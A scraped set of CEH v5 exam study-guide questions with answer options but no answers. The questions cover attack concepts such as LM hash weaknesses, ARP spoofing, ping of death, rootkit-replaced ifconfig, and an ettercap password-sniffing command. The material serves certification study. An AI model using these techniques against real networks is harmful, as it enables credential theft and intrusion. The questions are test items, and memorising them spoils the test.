SNMP is a protocol used to query hosts, servers, and devices about performance or health status data. This protocol haslong been used by hackers to gather great amount of information about remote hosts. Which of the following features makesthis possible?(Select all that apply)It uses TCP as the underlying protocolIt uses community string sent in as clear textIt is susceptible to sniffingIt is used by ALL devices on the market

Attackers can potentially intercept and modify unsigned SMB packets, modify the traffic and forward it so that the servermight perform undesirable actions. Alternatively, the attacker could pose as the server or client after a legitimate authenticationand gain unauthorized access to data. Which of the following is NOT a means that can be used to minimize or protect againstsuch an attack?(Select all that apply)SMB SigningTimestampsFile permissionsSequence numbers monitoring

Jonathan being a keen administrator has followed all of the best practices he could find on securing his Windows Server.He renamed the Administrator account to a new name that cannot be easily

Page 76: 6673158 CEH v5 Exam Study Guide

guessed but there remain people who attemptto compromise his newly renamed administrator account. How can a remote attacker decipher the name of the administratoraccount if it has been renamed?(Select the Best Answer)The attacker used the user2sid programThe attacker used the sid2user programThe attacker used NMAP with the V switchThe attacker guessed the new name

In the context of password security. A simple dictionary attack involves loading a dictionary file (a text file full of dictionarywords) into a cracking application such as L0phtCrack or John the Ripper, and running it against user accounts locatedby the application. The larger the word and word fragment selection, the more effective the dictionary attack is. The bruteforce method is the most inclusive - though slow. Usually, it tries every possible letter and number combination in its automatedexploration. If you would use both brute force and dictionary combined together to have variation of words, how would youcall such an attack?(Select the Best Answer)Full BlownThoroughHybridBruteDict Once an intruder has access to a remote system with a valid username and password, the attacker will attempt to increasehis privileges by escalating the used account to that having increased privileges such as that of an administrator. What wouldbe the best countermeasure to protect against such escalation?(Select the Best Answer)Give users tokensGive user the least amount of privilegesGive users two passwordsGive users a strong policy document

Bob is doing a password assessment for one of his clients. Bob suspects that policies are not in place and weak passwordsare probably the norm throughout the company he is evaluating. Bob is familiar with password weaknesses and key loggers.What are the means that Bob can use to get password from his client hosts and servers?

Page 77: 6673158 CEH v5 Exam Study Guide

(Select the Best Answer)Hardware, Software, and SniffingHardware and Software KeyloggersPasswords are always best obtained using Hardware key loggersSoftware only, they are the most effective

Windows LAN Manager (LM) hashes are known to be weak. Which of the following are weaknesses of LM?(Select all that apply)Converts password to uppercaseHashes are sent in clear over the networkMakes use of only 32-bit encryptionEffective length is 7 characters

An attacker has successfully compromised a remote computer. Which of the following comes as one of the last steps thatshould be taken to ensure that the compromise cannot be traced back to the source of the problem?(Select the Best Answer)Install patchesSetup a backdoorCover your tracksInstall a zombie for DDOS

A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) thanit was intended to hold. What is the most common cause of buffer overflow in software today?(Select the Best Answer)Bad permissions on filesHigh bandwidth and large number of usersUsage of non standard programming languagesBad quality assurance on software produced

Which of the following statements would NOT be a proper definition for a Trojan Horse?(Select the Best Answer)An unauthorized program contained within a legitimate program. This unauthorized program performs functions unknown(and probably unwanted) by the userA legitimate program that has been altered by the placement of unauthorized

Page 78: 6673158 CEH v5 Exam Study Guide

code within it; this code performs functionsunknown (and probably unwanted) by the userAn authorized program that has been designed to capture keyboard keystroke while the user is unaware of such activitybeing performedAny program that appears to perform a desirable and necessary function but that (because of unauthorized code within it that is unknown to the user) performs functions unknown (and definitely unwanted) by the user

In the context of Trojans, what is the definition of a Wrapper?(Select the Best Answer)An encryption tool to protect the TrojanA tool used to bind the Trojan with a legitimate fileA tool used to encapsulate packets within a new header and footerA tool used to calculate bandwidth and CPU cycles wasted by the Trojan

Neil is very closely monitoring his firewall rules and logs on a regular basis. Some of the users have complained to Neilthat there are a few employees who are visiting offensive web site during work hours, without any consideration for others.Neil knows that he has an up-to-date content filtering system and such access should not be authorized. What type of techniquemight be used by these offenders to access the Internet without restriction?(Select the Best Answer)They are using UDP which is always authorized at the firewallThey are using tunneling software which allows them to communicate with protocols in a way it was not intendedThey have been able to compromise the firewall, modify the rules, and give themselves proper accessThey are using an older version of Internet Explorer that allow them to bypass the proxy server

Virus Scrubbers and other malware detection program can only detect items they know about. Which of the following toolwould allow you to detect unauthorized changes or modification of binary files on your system by unknown malware?(Select the Best Answer)File integrity verification toolsAnti-Virus SoftwareA properly configured gatewayThere is no way of finding out until a new updated signature file is released

Page 79: 6673158 CEH v5 Exam Study Guide

Snort is an open source Intrusion Detection System. However, it can also be used for a few other purposes such as a sniffer.Which of the choices below are the proper features offered by Snort?(Select the Best Answer)IDS, Packet Logger, SnifferIDS, Firewall, SnifferIDS, Sniffer, ProxyIDS, Sniffer, content inspector

Windump is a Windows port of the famous TCPDump packet sniffer available on a variety of platforms. In order to use thistool on the Windows platform you must install a packet capture library. What is the name of this library?(Select the Best Answer)NTPCAPLibPCAPWinPCAPPCAP

Eric has discovered a fantastic package of tools named Dsniff on the Internet. He learnt to use these tools in his lab andis now ready for real world exploitation. He was able to effectively intercept communications between two entities and establishcredentials with both sides of the connections. The two remote ends of the communication never notice that Eric was relayingthe information between the two. How would you call this attack?(Select the Best Answer)InterceptorMan-in-the-middleArp ProxyPoisoning Attack

Samantha was hired to perform an internal security test of company XYZ. She quickly realized that all networks are makinguse of switches instead of traditional hubs. This greatly limits her ability to gather information through network sniffing. Whichof the following techniques could she use to gather information from the switched network or to disable some of the trafficisolation feature of the switch?(Select all that apply)Ethernet Zapping

Page 80: 6673158 CEH v5 Exam Study Guide

MAC FloodingSniffing in promiscuous modeArp Spoofing

What is the goal of a Denial of Service attack?(Select the Best Answer)Capture files from a remote computerRender a network or computer incapable of providing normal serviceExploit a weakness in the TCP stackItem 106 Bryce the bad boy is purposely sending fragmented ICMP packets to a remote target. The total size of this ICMP packetonce reconstructed is over 65,536 bytes. From the information given, what type of attack is Bryce attempting to perform?(Select the Best Answer)SYN FloodSmurfPing of DeathFraggle

Clive has been monitoring his IDS and sees that there are a huge number of ICMP Echo Reply packets that are being receivedon the external gateway interface. Further inspection reveals they are not responses from internal hosts' requests but simplyresponses coming from the Internet. What could be the likely cause of this?(Select the Best Answer)Someone spoofed Clive's IP address while doing a smurf attackSomeone spoofed Clive's IP address while doing a land attackSomeone spoofed Clive's IP address while doing a fraggle attackSomeone spoofed Clive's IP address while doing a DoS attack

You have been called to investigate a sudden increase in network traffic at Company XYZ. It seems that traffic generatedwas too heavy that normal business functions could no longer be rendered to external employees and clients. After a quickinvestigation, you have found computer that had services running attached to TFN2k and Trinoo software. What do youthink was the most likely cause of this sudden increase in traffic?(Select the Best Answer)A distributed denial of service attackA network card that was jabberingA bad route on the firewall

Page 81: 6673158 CEH v5 Exam Study Guide

Within the context of Computer Security, which of the following statements describe Social Engineering best?(Select the Best Answer)Social Engineering is the act of publicly disclosing informationSocial Engineering is the act of getting needed information from a person rather than breaking into a systemSocial Engineering is the means put in place by human resource to perform time accountingSocial Engineering is a training program within sociology studies

Why is Social Engineering considered attractive by hackers and commonly done by experts in the field?(Select the Best Answer)It is done by well known hackersIt does not require a computer in order to commit a crimeIt is easy and extremely effective to gain informationIt is not considered illegal

Joel and her team have been going through tons of garbage, recycled paper, and other rubbish in order to find some informationabout the target they are attempting to penetrate. How would you call this type of activity?(Select the Best Answer)CI GatheringScanningDumpster DivingGarbage Scooping

John has performed a scan of the web server with NMAP but did not gather enough information to accurately identify whichoperating system is running on the remote host. How could you use a web server to help in identifying the OS that is beingused?(Select the Best Answer)Connect to the web server with a browser and look at the web pageConnect to the web server with an FTP clientTelnet to port 8080 on the web server and look at the default page codeTelnet to an open port and grab the banner

Page 82: 6673158 CEH v5 Exam Study Guide

On default installation of Microsoft IIS web server, under which privilege does the web server software is executed?(Select the Best Answer)EveryoneGuestSystemAdministrator

Barney is looking for a Windows NT/2000/XP command-line tool that can be used to assign, display, or modify ACL's (accesscontrol lists) to files or folders and that could also be used within batch files. Which of the following tool can be used for thatpurpose?(Select the Best Answer)PERM.exeCACLS.exeCLACS.exeNTPERM.exe

Bob is very security conscious, he is about to test a site that is known to have malicious applets, code, and more. Bob alwaysmakes use of a basic Web Browser to perform such testing, which of the following web browsers can adequately fill thispurpose?(Select the Best Answer)Internet ExplorerMozillaLynxTiger

While doing web application testing, you might be required to look through multiple web pages online which can take a longtime. Which process below would be a more efficient way of doing this type of validation?(Select the Best Answer)Use mget utility to download all pages locally for further inspectionUse wget utility to download all pages locally for further inspectionUse get * utility to download all pages locally for further inspectionUse get utility to download all pages locally for further inspection

Jane has just accessed her preferred ecommerce web site and she has seen an

Page 83: 6673158 CEH v5 Exam Study Guide

item she would like to buy. Jane considersthe price a bit too steep, she looks at the page source code and decides to save the page locally to modify some of the pagevariables. In the context of web application security, what do you think Jane has changed?(Select the Best Answer)A 'hidden' form field valueA 'hidden' price valueAn integer variableA page cannot be changed locally, it is served by a web server

Bob has been hired to do a web application security test. Bob notices that the site is dynamic and must make use of a backend database. Bob wants to validate if a SQL Injection would be possible. What is the first character that Bob should useto attempt breaking valid SQL request?(Select the Best Answer)Semi ColumnDouble QuoteSingle QuoteExclamation Mark

On wireless networks, SSID is used to identify the network. Why are SSID not considered to be a good security mechanismto protect a wireless network?(Select the Best Answer)The SSID is only 32 bits in lengthThe SSID is transmitted in clear textThe SSID is the same as the MAC address for all vendorsThe SSID is to identify a station, not a network

Melissa is a virus that targeted Microsoft Windows platforms. To which category does this virus belong?(Select the Best Answer)PolymorphicBoot Sector infectorSystemMacro

John is using a special tool on his Linux platform that has a database containing signatures to be able to detect hundredsof vulnerabilities in UNIX, Windows, and commonly-used web CGI scripts.

Page 84: 6673158 CEH v5 Exam Study Guide

Moreover, the database detects DDoS zombiesand Trojans as well. What would be the name of this tool?(Select the Best Answer)nmaphping2nessusmake

John is discussing security with Jane; she mentioned a few times to John that she suspects an LKM was installed on herserver and this is why it has been acting so erratically lately. LKM stands for Loadable Kernel Module, what does it meansin the context of Linux Security?(Select the Best Answer)Loadable Kernel Modules are a mechanism for adding functionality to a filesystem without requiring a kernel recompilationLoadable Kernel Modules are a mechanism for adding functionality to an operating-system kernel after it has been recompiledand the system rebootedLoadable Kernel Modules are a mechanism for adding auditing to an operating-system kernel without requiring a kernelrecompilationLoadable Kernel Modules are a mechanism for adding functionality to an operating-system kernel without requiring a kernelrecompilation

SSL has been seen as the solution to a lot of common security problems. Administrator will often time make use of SSLto encrypt communications from points A to point B. Why do you think this could be a bad idea if there is an Intrusion DetectionSystem deployed to monitor the traffic between point A and B?(Select the Best Answer)SSL is redundant if you already have IDS's in placeSSL will trigger rules at regular interval and force the administrator to turn them offSSL will slow down the IDS while it is breaking the encryption to see the packet contentSSL will mask the content of the packet and Intrusion Detection System are blinded

Curt has successfully compromised a web server sitting behind a firewall using a vulnerability in the web server program.He would now like to install a backdoor program but knows that all ports are not

Page 85: 6673158 CEH v5 Exam Study Guide

open inbound on the firewall. Which portin the list below will most likely be open and allowed to reach the server that Curt has just compromised?(Select the Best Answer)531102569

Which definition below best describes a covert channel?(Select the Best Answer)A server program using a port that is not well knownMaking use of a protocol in a way it was not intended to be usedIt is the multiplexing taking place on a communication linkIt is one of the weak channels used by WEP which makes it insecure

Jane wishes to forward X-Windows traffic to a remote host as well as POP3 traffic. She is worried that adversaries mightbe monitoring the communication link and could inspect captured traffic. She would like to tunnel the information to the remoteend but does not have VPN capabilities to do so. Which of the following tools can she use to protect the link?(Select the Best Answer)MD5SSHRSAPGP

Steven the hacker realizes the nework administrator of Acme Corporation is using syskey in Windows 2000 Server to protecthis resources in the organization. Syskey independently encrypts the hashes so that physical access to the server, tapes,or ERDs is only first step to cracking the passwords. Steven must break through the encryption used by syskey before hecan attempt to brute force dictionary attacks on the hashes. Steven runs a program called "SysCracker" targeting the Windows2000 Server machine in attempting to crack the hash used by Syskey. He needs to configure the encryption level beforehe can launch the attack. How many bits does Syskey use for encryption?(Select the Best Answer)40-bit encryption64-bit encryption256-bit encryption

Page 86: 6673158 CEH v5 Exam Study Guide

128-bit encryption

Jess the hacker runs L0phtCrack's built-in sniffer utility which grabs SMB password hashes and stores them for offline cracking.Once cracked, these passwords can provide easy access to whatever network resources the user account has access to.But Jess is not picking up hashes from the network. Why?(Select the Best Answer)The network protocol is configured to use SMB SigningThe physical network wire is on fibre optic cableThe network protocol is configured to use IPSECL0phtCrack SMB sniffing only works through Switches and not Hubs

Joseph the Hacker breaks into Hackcme Corporation's Linux system and plants a wiretap program in order to sniff passwordsand user accounts off the wire. The wiretap program is embedded as a trojan in one of the network utilities. Joseph is worriedthat network administrator might detect the wiretap program by querying the interfaces to see if they are running in promiscuousmode.Running "ifconfig -a" produces the following:# ifconfig -alo0: flags=849>UP,LOOPBACK,RUNNING,MULTICAST< mtu 8232inet 127.0.0.1 netmask ff000000hme0: flflags=863>UP,BROADCAST,NOTRAILERS,RUNNING,PROMISC,MULTICAST< mtu 1500inet 192.0.2.99 netmask ffffff00broadcast 134.5.2.255 ether 8:0:20:9c:a2:35What can Joseph do to hide the wiretap program from being detected by ifconfig command?(Select the Best Answer)Block output to the console whenever the user runs ifconfig command by running screen capture utilityRun the wiretap program in stealth mode from being detected by the ifconfig commandReplace original ifconfig utility with the rootkit version of ifconfig hiding Promiscuous information from being displayed onthe consoleYou cannot disable Promiscuous mode detection on Linux systems

What does the following command in "Ettercap" do?ettercap -NCLzs --quiet(Select the Best Answer)This command will provide you the entire list of hosts in the LAN

Page 87: 6673158 CEH v5 Exam Study Guide

This command will check if someone is poisoning you and will report its IPThis command will detach ettercap from console and log all the sniffed passwords to a fileThis command broadcasts ping to scan the LAN instead of ARP request all the subnet IPs

------------------- GOOD LUCK ON THE EXAM ---------------------------------------

Homework Help https://www.homeworkping.com/


Recommended